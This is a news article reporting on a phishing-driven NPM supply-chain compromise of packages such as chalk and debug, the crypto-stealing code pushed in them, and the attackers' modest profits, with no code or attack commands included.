The largest supply-chain attack in NPM ecosystem history impacted approximately 10% of cloud environments after attackers compromised maintainer Josh Junon's account through a phishing campaign, yet generated minimal profits for the perpetrators.
The attack began when Junon fell victim to a password reset phishing lure, allowing threat actors to access his NPM account and push malicious updates to highly popular packages including chalk and debug-js, which collectively receive over 2.6 billion weekly downloads. The attackers embedded cryptocurrency-stealing malware that redirected Ethereum and Solana transactions to attacker-controlled wallets.
The compromise's reach was staggering, with Wiz security researchers finding that the targeted packages served as fundamental building blocks in 99% of cloud environments. During the two-hour window before discovery and removal, the malicious packages were downloaded by roughly 10% of cloud environments, demonstrating the rapid propagation potential of supply-chain attacks.
Despite the massive scale and widespread impact, the attackers' financial gains were surprisingly modest. Security Alliance analysis revealed the malicious code specifically targeted browser environments, hooking cryptocurrency signing requests to perform crypto-jacking operations. The attackers managed to steal only five cents worth of ETH and $20 of an obscure memecoin initially.
Socket researchers later expanded the investigation, discovering the same phishing campaign had compromised DuckDB's maintainer account with identical crypto-stealing code. Their comprehensive analysis traced total profits across all attacker wallets to approximately $429 in Ethereum, $46 in Solana, and small amounts in Bitcoin, Tron, Bitcoin Cash, and Litecoin, totaling roughly $600 .
The limited payload targeting only cryptocurrency transactions likely prevented a more catastrophic security incident. Attackers could have deployed reverse shells, facilitated lateral network movement, or installed destructive malware given their privileged access .
While companies invested significant hours in cleanup, rebuilding, and security auditing following the incident, the actual security implications remained minimal. The attacker wallets containing substantial amounts have been flagged by security services, further limiting the perpetrators' ability to convert or utilize their meager gains.
This incident highlights both the vulnerability of open-source ecosystems to social engineering attacks and the potential for widespread impact even when financial motivation proves unsuccessful.
